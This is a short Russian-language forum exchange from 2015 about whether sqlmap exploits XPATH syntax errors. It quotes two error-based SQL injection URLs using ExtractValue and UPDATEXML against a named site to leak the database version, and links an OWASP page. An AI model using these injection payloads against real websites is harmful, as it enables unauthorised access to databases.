
18.11.2015, 22:03
|
|
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами:
8142806
Репутация:
324
|
|
Сообщение от winstrool
↑
НЕТ, РАБОТАЕТ!!!
https://github.com/sqlmapproject/sql...rror_based.xml
Вот выдержка из реализации payloads в sqlmap:
вот примеры функций что юзаются:
_ttp://staynaughty.com/wall.php?uid=442+or(
ExtractValue
(1,version()))
_ttp://staynaughty.com/wall.php?uid=442+or(
UPDATEXML
(1,version(),2))
я немного нетак понял видать
Сообщение от powerOfthemind
↑
sqlmap работает с XPATH syntax error ?
ты имеешь ввиду эксплуатацию SQL инъекций через xml функции?
или эксплуатацию Xpath инъекций? ( https://www.owasp.org/index.php/XPATH_Injection)
|
|
|